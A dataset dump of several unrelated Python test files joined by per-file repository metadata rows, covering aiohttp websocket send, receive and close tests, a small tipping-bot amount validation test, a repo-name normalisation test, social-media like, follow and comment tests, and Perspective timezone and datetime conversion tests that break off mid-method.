assert(agent.unlike(photo))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photo_sets))
def test_like_unlike_photo_set(login, password, shortcode):
agent = AgentAccount(login, password)
photo_set = Media(shortcode)
assert(agent.like(photo_set))
assert(agent.unlike(photo_set))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(videos))
def test_like_unlike_video(login, password, shortcode):
agent = AgentAccount(login, password)
video = Media(shortcode)
assert(agent.like(video))
assert(agent.unlike(video))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,username", parametrize(accounts))
def test_follow_unfollow(login, password, username):
agent = AgentAccount(login, password)
account = Account(username)
assert(agent.follow(account))
assert(agent.unfollow(account))
Account.clear_cache()
@pytest.mark.parametrize("login,password,shortcode",
parametrize([choice(photos), choice(photo_sets), choice(videos)]))
def test_comment(login, password, shortcode):
agent = AgentAccount(login, password)
media = Media(shortcode)
comment = agent.add_comment(media, "test")
agent.delete_comment(comment)
Account.clear_cache()
Media.clear_cache()
Comment.clear_cache()
| 29.863753
| 100
| 0.662994
| 1,357
| 11,617
| 5.559322
| 0.058954
| 0.139581
| 0.066808
| 0.093054
| 0.848091
| 0.807927
| 0.768558
| 0.754109
| 0.719247
| 0.633749
| 0
| 0.008175
| 0.210295
| 11,617
| 388
| 101
| 29.940722
| 0.814149
| 0
| 0
| 0.639535
| 0
| 0
| 0.059654
| 0.046828
| 0
| 0
| 0
| 0
| 0.124031
| 1
| 0.108527
| false
| 0.317829
| 0.01938
| 0
| 0.131783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
16cd4efcde768d9949800ada0aa7712cf0286a23
| 12,020
|
py
|
Python
|
tests/test_client_ws_functional.py
|
Martiusweb/aiohttp
|
718313b89d6a5b1ecdc48cdd908aabdbac53a1cf
|
[
"Apache-2.0"
] | null | null | null |
tests/test_client_ws_functional.py
|
Martiusweb/aiohttp
|
718313b89d6a5b1ecdc48cdd908aabdbac53a1cf
|
[
"Apache-2.0"
] | null | null | null |
tests/test_client_ws_functional.py
|
Martiusweb/aiohttp
|
718313b89d6a5b1ecdc48cdd908aabdbac53a1cf
|
[
"Apache-2.0"
] | 1
|
2019-11-24T23:12:51.000Z
|
2019-11-24T23:12:51.000Z
|
import asyncio
import pytest
import aiohttp
from aiohttp import hdrs, helpers, web
@asyncio.coroutine
def test_send_recv_text(loop, test_client):
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
msg = yield from ws.receive_str()
ws.send_str(msg+'/answer')
yield from ws.close()
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/')
resp.send_str('ask')
data = yield from resp.receive_str()
assert data == 'ask/answer'
yield from resp.close()
@asyncio.coroutine
def test_send_recv_bytes_bad_type(loop, test_client):
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
msg = yield from ws.receive_str()
ws.send_str(msg+'/answer')
yield from ws.close()
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/')
resp.send_str('ask')
with pytest.raises(TypeError):
yield from resp.receive_bytes()
yield from resp.close()
@asyncio.coroutine
def test_send_recv_bytes(loop, test_client):
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
msg = yield from ws.receive_bytes()
ws.send_bytes(msg+b'/answer')
yield from ws.close()
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/')
resp.send_bytes(b'ask')
data = yield from resp.receive_bytes()
assert data == b'ask/answer'
yield from resp.close()
@asyncio.coroutine
def test_send_recv_text_bad_type(loop, test_client):
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
msg = yield from ws.receive_bytes()
ws.send_bytes(msg+b'/answer')
yield from ws.close()
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/')
resp.send_bytes(b'ask')
with pytest.raises(TypeError):
yield from resp.receive_str()
yield from resp.close()
@asyncio.coroutine
def test_send_recv_json(loop, test_client):
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
data = yield from ws.receive_json()
ws.send_json({'response': data['request']})
yield from ws.close()
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/')
payload = {'request': 'test'}
resp.send_json(payload)
data = yield from resp.receive_json()
assert data['response'] == payload['request']
yield from resp.close()
@asyncio.coroutine
def test_ping_pong(loop, test_client):
closed = helpers.create_future(loop)
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
msg = yield from ws.receive_bytes()
ws.ping()
ws.send_bytes(msg+b'/answer')
try:
yield from ws.close()
finally:
closed.set_result(1)
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/')
resp.ping()
resp.send_bytes(b'ask')
msg = yield from resp.receive()
assert msg.type == aiohttp.WSMsgType.BINARY
assert msg.data == b'ask/answer'
msg = yield from resp.receive()
assert msg.type == aiohttp.WSMsgType.CLOSE
yield from resp.close()
yield from closed
@asyncio.coroutine
def test_ping_pong_manual(loop, test_client):
closed = helpers.create_future(loop)
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
msg = yield from ws.receive_bytes()
ws.ping()
ws.send_bytes(msg+b'/answer')
try:
yield from ws.close()
finally:
closed.set_result(1)
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/', autoping=False)
resp.ping()
resp.send_bytes(b'ask')
msg = yield from resp.receive()
assert msg.type == aiohttp.WSMsgType.PONG
msg = yield from resp.receive()
assert msg.type == aiohttp.WSMsgType.PING
resp.pong()
msg = yield from resp.receive()
assert msg.data == b'ask/answer'
msg = yield from resp.receive()
assert msg.type == aiohttp.WSMsgType.CLOSE
yield from closed
@asyncio.coroutine
def test_close(loop, test_client):
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
yield from ws.receive_bytes()
ws.send_str('test')
yield from ws.receive()
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/')
resp.send_bytes(b'ask')
closed = yield from resp.close()
assert closed
assert resp.closed
assert resp.close_code == 1000
msg = yield from resp.receive()
assert msg.type == aiohttp.WSMsgType.CLOSED
@asyncio.coroutine
def test_close_from_server(loop, test_client):
closed = helpers.create_future(loop)
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
try:
yield from ws.receive_bytes()
yield from ws.close()
finally:
closed.set_result(1)
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/')
resp.send_bytes(b'ask')
msg = yield from resp.receive()
assert msg.type == aiohttp.WSMsgType.CLOSE
assert resp.closed
msg = yield from resp.receive()
assert msg.type == aiohttp.WSMsgType.CLOSED
yield from closed
@asyncio.coroutine
def test_close_manual(loop, test_client):
closed = helpers.create_future(loop)
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
yield from ws.receive_bytes()
ws.send_str('test')
try:
yield from ws.close()
finally:
closed.set_result(1)
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/', autoclose=False)
resp.send_bytes(b'ask')
msg = yield from resp.receive()
assert msg.data == 'test'
msg = yield from resp.receive()
assert msg.type == aiohttp.WSMsgType.CLOSE
assert msg.data == 1000
assert msg.extra == ''
assert not resp.closed
yield from resp.close()
yield from closed
assert resp.closed
@asyncio.coroutine
def test_close_timeout(loop, test_client):
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
yield from ws.receive_bytes()
ws.send_str('test')
yield from asyncio.sleep(10, loop=loop)
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/', timeout=0.2, autoclose=False)
resp.send_bytes(b'ask')
msg = yield from resp.receive()
assert msg.data == 'test'
assert msg.type == aiohttp.WSMsgType.TEXT
msg = yield from resp.close()
assert resp.closed
assert isinstance(resp.exception(), asyncio.TimeoutError)
@asyncio.coroutine
def test_close_cancel(loop, test_client):
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
yield from ws.receive_bytes()
ws.send_str('test')
yield from asyncio.sleep(10, loop=loop)
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/', autoclose=False)
resp.send_bytes(b'ask')
text = yield from resp.receive()
assert text.data == 'test'
t = loop.create_task(resp.close())
yield from asyncio.sleep(0.1, loop=loop)
t.cancel()
yield from asyncio.sleep(0.1, loop=loop)
assert resp.closed
assert resp.exception() is None
@asyncio.coroutine
def test_override_default_headers(loop, test_client):
@asyncio.coroutine
def handler(request):
assert request.headers[hdrs.SEC_WEBSOCKET_VERSION] == '8'
ws = web.WebSocketResponse()
yield from ws.prepare(request)
ws.send_str('answer')
yield from ws.close()
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
headers = {hdrs.SEC_WEBSOCKET_VERSION: '8'}
client = yield from test_client(app)
resp = yield from client.ws_connect('/', headers=headers)
msg = yield from resp.receive()
assert msg.data == 'answer'
yield from resp.close()
@asyncio.coroutine
def test_additional_headers(loop, test_client):
@asyncio.coroutine
def handler(request):
assert request.headers['x-hdr'] == 'xtra'
ws = web.WebSocketResponse()
yield from ws.prepare(request)
ws.send_str('answer')
yield from ws.close()
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/', headers={'x-hdr': 'xtra'})
msg = yield from resp.receive()
assert msg.data == 'answer'
yield from resp.close()
@asyncio.coroutine
def test_recv_protocol_error(loop, test_client):
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
yield from ws.receive_str()
ws._writer.writer.write(b'01234' * 100)
yield from ws.close()
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/')
resp.send_str('ask')
msg = yield from resp.receive()
assert msg.type == aiohttp.WSMsgType.ERROR
assert type(msg.data) is aiohttp.WebSocketError
assert msg.data.args[0] == 'Received frame with non-zero reserved bits'
assert msg.extra is None
yield from resp.close()
@asyncio.coroutine
def test_recv_timeout(loop, test_client):
@asyncio.coroutine
def handler(request):
ws = web.WebSocketResponse()
yield from ws.prepare(request)
yield from ws.receive_str()
yield from asyncio.sleep(0.1, loop=request.app.loop)
yield from ws.close()
return ws
app = web.Application(loop=loop)
app.router.add_route('GET', '/', handler)
client = yield from test_client(app)
resp = yield from client.ws_connect('/')
resp.send_str('ask')
with pytest.raises(asyncio.TimeoutError):
with aiohttp.Timeout(0.01, loop=app.loop):
yield from resp.receive()
yield from resp.close()
| 25.466102
| 75
| 0.645341
| 1,562
| 12,020
| 4.857875
| 0.069782
| 0.14233
| 0.063785
| 0.057986
| 0.891671
| 0.85767
| 0.833553
| 0.819979
| 0.786505
| 0.770295
| 0
| 0.004148
| 0.237854
| 12,020
| 471
| 76
| 25.52017
| 0.824146
| 0
| 0
| 0.805797
| 0
| 0
| 0.030033
| 0
| 0
| 0
| 0
| 0
| 0.110145
| 1
| 0.092754
| false
| 0
| 0.011594
| 0
| 0.144928
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16da25251bf979a10758e5dadd116d7d7491b726
| 656
|
py
|
Python
|
tests/TestUtils.py
|
magayorker/magatip
|
1aef0b5d3228ed35f1547cb184a5c3a9bd7c5b76
|
[
"MIT"
] | 49
|
2017-05-10T09:48:05.000Z
|
2022-03-19T20:30:32.000Z
|
tests/TestUtils.py
|
hockleyj/sodogetip
|
37d6880f3dbe2bb46a29bfa67d93763b91c7a6e7
|
[
"MIT"
] | 57
|
2017-05-10T02:56:22.000Z
|
2021-10-06T11:44:22.000Z
|
tests/TestUtils.py
|
hockleyj/sodogetip
|
37d6880f3dbe2bb46a29bfa67d93763b91c7a6e7
|
[
"MIT"
] | 25
|
2017-05-09T21:29:29.000Z
|
2022-02-06T03:57:17.000Z
|
import unittest
import utils
class TestUtils(unittest.TestCase):
def test_check_amount_valid(self):
self.assertEqual(True, utils.check_amount_valid(1))
self.assertEqual(True, utils.check_amount_valid(10))
self.assertEqual(False, utils.check_amount_valid(0.1))
self.assertEqual(False, utils.check_amount_valid(-1))
self.assertEqual(True, utils.check_amount_valid("1"))
self.assertEqual(True, utils.check_amount_valid("10"))
self.assertEqual(False, utils.check_amount_valid("0.1"))
self.assertEqual(False, utils.check_amount_valid("-1"))
if __name__ == '__main__':
unittest.main()
| 32.8
| 64
| 0.71189
| 85
| 656
| 5.176471
| 0.247059
| 0.225
| 0.327273
| 0.381818
| 0.763636
| 0.763636
| 0.763636
| 0.763636
| 0.763636
| 0.763636
| 0
| 0.021818
| 0.161585
| 656
| 19
| 65
| 34.526316
| 0.778182
| 0
| 0
| 0
| 0
| 0
| 0.02439
| 0
| 0
| 0
| 0
| 0
| 0.571429
| 1
| 0.071429
| false
| 0
| 0.142857
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
16e884a88674f69f53168af91d40d8bbaf1ef361
| 157
|
py
|
Python
|
tests/test_rehome.py
|
hiqdev/rehome
|
f14ff75c352a9d4d35a4f6e26a6ad66ad9677099
|
[
"BSD-3-Clause"
] | 5
|
2016-09-23T09:48:45.000Z
|
2018-10-29T13:37:50.000Z
|
tests/test_rehome.py
|
hiqdev/rehome
|
f14ff75c352a9d4d35a4f6e26a6ad66ad9677099
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_rehome.py
|
hiqdev/rehome
|
f14ff75c352a9d4d35a4f6e26a6ad66ad9677099
|
[
"BSD-3-Clause"
] | null | null | null |
import Rehome
def test_normalize_repo():
assert '.' == Rehome.normalize_repo('.')
assert 'https://github.com/a/b' == Rehome.normalize_repo('a/b')
| 19.625
| 67
| 0.66242
| 21
| 157
| 4.761905
| 0.571429
| 0.39
| 0.38
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146497
| 157
| 7
| 68
| 22.428571
| 0.746269
| 0
| 0
| 0
| 0
| 0
| 0.174194
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc5eb207fe304a37cc6208deadedbb743424f931
| 56,727
|
py
|
Python
|
python/perspective/perspective/tests/table/test_table_datetime.py
|
mehtabhavin10/perspective
|
faa9f721d0518a620508a78298a96cb005c07275
|
[
"Apache-2.0"
] | 1
|
2020-05-13T06:30:55.000Z
|
2020-05-13T06:30:55.000Z
|
python/perspective/perspective/tests/table/test_table_datetime.py
|
mehtabhavin10/perspective
|
faa9f721d0518a620508a78298a96cb005c07275
|
[
"Apache-2.0"
] | null | null | null |
python/perspective/perspective/tests/table/test_table_datetime.py
|
mehtabhavin10/perspective
|
faa9f721d0518a620508a78298a96cb005c07275
|
[
"Apache-2.0"
] | null | null | null |
# *****************************************************************************
#
# Copyright (c) 2019, the Perspective Authors.
#
# This file is part of the Perspective library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
import os
import time
import pytz
import numpy as np
import pandas as pd
from datetime import date, datetime
from dateutil import tz
from perspective.table import Table
LOCAL_DATETIMES = [
datetime(2019, 1, 11, 0, 10, 20),
datetime(2019, 1, 11, 11, 10, 20),
datetime(2019, 1, 11, 19, 10, 20)
]
# Test the DST transition for Continental US
LOCAL_DATETIMES_DST = [
datetime(2019, 3, 9, 12, 10, 20),
datetime(2019, 3, 19, 12, 10, 20),
datetime(2019, 11, 2, 12, 10, 20),
datetime(2019, 11, 3, 12, 10, 20)
]
LOCAL_TIMESTAMPS = [pd.Timestamp(d) for d in LOCAL_DATETIMES]
LOCAL_TIMESTAMPS_DST = [pd.Timestamp(d) for d in LOCAL_DATETIMES_DST]
# Set up testing data
UTC = pytz.UTC
UTC_DATETIMES = [UTC.localize(d) for d in LOCAL_DATETIMES]
UTC_TIMESTAMPS = [UTC.localize(d) for d in LOCAL_TIMESTAMPS]
UTC_DATETIMES_DST = [UTC.localize(d, is_dst=True) for d in LOCAL_DATETIMES_DST]
UTC_TIMESTAMPS_DST = [UTC.localize(d, is_dst=True) for d in LOCAL_TIMESTAMPS_DST]
PST = pytz.timezone("US/Pacific")
CST = pytz.timezone("US/Central")
EST = pytz.timezone("US/Eastern")
GMT = pytz.timezone("GMT")
HKT = pytz.timezone("Asia/Hong_Kong")
JPT = pytz.timezone("Asia/Tokyo")
ACT = pytz.timezone("Australia/ACT")
TIMEZONES = [PST, CST, EST, GMT, HKT, JPT, ACT]
TZ_DATETIMES = {}
TZ_TIMESTAMPS = {}
TZ_DATETIMES_DST = {}
TZ_TIMESTAMPS_DST = {}
for TZ in TIMEZONES:
TZ_DATETIMES[TZ.zone] = [TZ.localize(d) for d in LOCAL_DATETIMES]
TZ_TIMESTAMPS[TZ.zone] = [d.tz_localize(TZ) for d in LOCAL_TIMESTAMPS]
TZ_DATETIMES_DST[TZ.zone] = [d.astimezone(TZ) for d in UTC_DATETIMES_DST]
TZ_TIMESTAMPS_DST[TZ.zone] = [d.tz_convert(TZ) for d in UTC_TIMESTAMPS_DST]
if os.name != 'nt':
# no tzset on windows, run these tests on linux/mac only
class TestTableLocalDateTime(object):
"""Test datetimes across configurations such as local time, timezone-aware,
timezone-naive, and UTC implementations.
"""
def setup_method(self):
# To make sure that local times are not changed, set timezone to EST
os.environ["TZ"] = "US/Eastern"
time.tzset()
def teardown_method(self):
# go back to UTC at end of each test method, for consistency
os.environ["TZ"] = "UTC"
time.tzset()
def test_table_should_assume_local_time(self):
"""If a datetime object has no `tzinfo`, it should be assumed to be in
local time and not be converted at all.
"""
data = {
"a": LOCAL_DATETIMES
}
table = Table(data)
assert table.view().to_dict()["a"] == LOCAL_DATETIMES
def test_table_should_assume_local_time_numpy_datetime64(self):
data = {
"a": [np.datetime64(d) for d in LOCAL_DATETIMES]
}
table = Table(data)
assert table.view().to_dict()["a"] == LOCAL_DATETIMES
def test_table_should_assume_local_time_pandas_timestamp(self):
data = {
"a": LOCAL_TIMESTAMPS
}
# Timestamps are assumed to be in UTC by pandas
table = Table(data)
# Timestamps are read out in local time
assert table.view().to_dict()["a"] == LOCAL_DATETIMES
def test_table_should_assume_local_time_pandas_timestamp_df(self):
data = pd.DataFrame({
"a": LOCAL_TIMESTAMPS
})
# Timestamps are assumed to be in UTC by pandas
table = Table(data)
# Timestamps are read out in local time
assert table.view().to_dict()["a"] == [
datetime(2019, 1, 10, 19, 10, 20),
datetime(2019, 1, 11, 6, 10, 20),
datetime(2019, 1, 11, 14, 10, 20)
]
def test_table_should_assume_local_time_dst(self):
"""If a datetime object has no `tzinfo`, it should be assumed to be in
local time and not be converted at all.
"""
data = {
"a": LOCAL_DATETIMES_DST
}
table = Table(data)
assert table.view().to_dict()["a"] == LOCAL_DATETIMES_DST
def test_table_should_assume_local_time_numpy_datetime64_dst(self):
data = {
"a": [np.datetime64(d) for d in LOCAL_DATETIMES_DST]
}
table = Table(data)
assert table.view().to_dict()["a"] == LOCAL_DATETIMES_DST
def test_table_should_assume_local_time_pandas_timestamp_dst(self):
data = {
"a": LOCAL_TIMESTAMPS_DST
}
table = Table(data)
assert table.view().to_dict()["a"] == LOCAL_DATETIMES_DST
def test_table_should_assume_local_time_pandas_timestamp_dst_df(self):
data = pd.DataFrame({
"a": LOCAL_TIMESTAMPS_DST
})
table = Table(data)
assert table.view().to_dict()["a"] == [
datetime(2019, 3, 9, 7, 10, 20),
datetime(2019, 3, 19, 8, 10, 20),
datetime(2019, 11, 2, 8, 10, 20),
datetime(2019, 11, 3, 7, 10, 20)
]
def test_table_datetime_min(self):
data = {
"a": [datetime.min]
}
table = Table(data)
assert table.view().to_dict()["a"] == [
datetime(1969, 12, 31, 19, 0)
]
def test_table_datetime_min_df(self):
data = pd.DataFrame({
"a": [datetime.min]
})
table = Table(data)
assert table.view().to_dict()["a"] == [
datetime(1969, 12, 31, 19, 0)
]
def test_table_datetime_1900(self):
data = {
"a": [datetime(1900, 1, 1)]
}
table = Table(data)
assert table.view().to_dict()["a"] == [
datetime(1900, 1, 1)
]
def test_table_datetime_1900_df(self):
data = pd.DataFrame({
"a": [datetime(1900, 1, 1)]
})
table = Table(data)
assert table.view().to_dict()["a"] == [
datetime(1899, 12, 31, 19)
]
def test_table_datetime_1899(self):
data = {
"a": [datetime(1899, 1, 1)]
}
table = Table(data)
assert table.view().to_dict()["a"] == [
datetime(1898, 12, 31, 19)
]
def test_table_datetime_1899_df(self):
data = pd.DataFrame({
"a": [datetime(1899, 1, 1)]
})
table = Table(data)
assert table.view().to_dict()["a"] == [
datetime(1898, 12, 31, 19)
]
def test_table_datetime_min_epoch(self):
data = {
"a": [0]
}
table = Table({
"a": datetime
})
table.update(data)
assert table.view().to_dict()["a"] == [
datetime(1969, 12, 31, 19, 0)
]
def test_table_datetime_min_epoch_df(self):
data = pd.DataFrame({
"a": [0]
})
table = Table({
"a": datetime
})
table.update(data)
assert table.view().to_dict()["a"] == [
datetime(1969, 12, 31, 19, 0)
]
class TestTableDateTimeUTCToLocal(object):
def teardown_method(self):
# Set timezone to UTC, always
os.environ["TZ"] = "UTC"
time.tzset()
def test_table_should_convert_UTC_to_local_time_pytz_pacific(self):
"""If the datetime has `tzinfo` set, use it to convert the datetime to
UTC. Make sure this works with both `pytz` and `dateutil` for
`datetime` and `pandas.Timestamp`.
"""
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict() == {
"a": [d.astimezone(PST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_central(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict() == {
"a": [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_eastern(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict() == {
"a": [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_GMT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict() == {
"a": [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_HKT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_JPT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_pytz_ACT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(ACT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_pacific(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict() == {
"a": [d.astimezone(PST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_central(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict() == {
"a": [d.astimezone(CST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_eastern(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict() == {
"a": [d.astimezone(EST).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_GMT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict() == {
"a": [d.astimezone(GMT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_pacific_DST(self):
data = {
"a": UTC_DATETIMES_DST
}
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict() == {
"a": [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Pacific"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_central_DST(self):
data = {
"a": UTC_DATETIMES_DST
}
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict() == {
"a": [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Central"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_eastern_DST(self):
data = {
"a": UTC_DATETIMES_DST
}
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict() == {
"a": [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Eastern"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_GMT_DST(self):
data = {
"a": UTC_DATETIMES_DST
}
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict() == {
"a": [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["GMT"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_pacific_DST_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS_DST
})
table = Table(data)
os.environ["TZ"] = "US/Pacific"
time.tzset()
# Should be in PST now
assert table.view().to_dict()["a"] == [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Pacific"]]
def test_table_should_convert_UTC_to_local_time_dateutil_central_DST_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS_DST
})
table = Table(data)
os.environ["TZ"] = "US/Central"
time.tzset()
# Should be in CST now
assert table.view().to_dict()["a"] == [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Central"]]
def test_table_should_convert_UTC_to_local_time_dateutil_eastern_DST_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS_DST
})
table = Table(data)
os.environ["TZ"] = "US/Eastern"
time.tzset()
# Should be in EST now
assert table.view().to_dict()["a"] == [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["US/Eastern"]]
def test_table_should_convert_UTC_to_local_time_dateutil_GMT_DST_timestamp(self):
data = pd.DataFrame({
"a": UTC_TIMESTAMPS_DST
})
table = Table(data)
os.environ["TZ"] = "GMT"
time.tzset()
# Should be in GMT now
assert table.view().to_dict()["a"] == [d.replace(tzinfo=None) for d in TZ_DATETIMES_DST["GMT"]]
def test_table_should_convert_UTC_to_local_time_dateutil_HKT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Asia/Hong_Kong"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(HKT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_JPT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Asia/Tokyo"
time.tzset()
assert table.view().to_dict() == {
"a": [d.astimezone(JPT).replace(tzinfo=None) for d in data["a"]]
}
def test_table_should_convert_UTC_to_local_time_dateutil_ACT(self):
data = {
"a": UTC_DATETIMES
}
table = Table(data)
os.environ["TZ"] = "Australia/Sydney"
time.tzset()
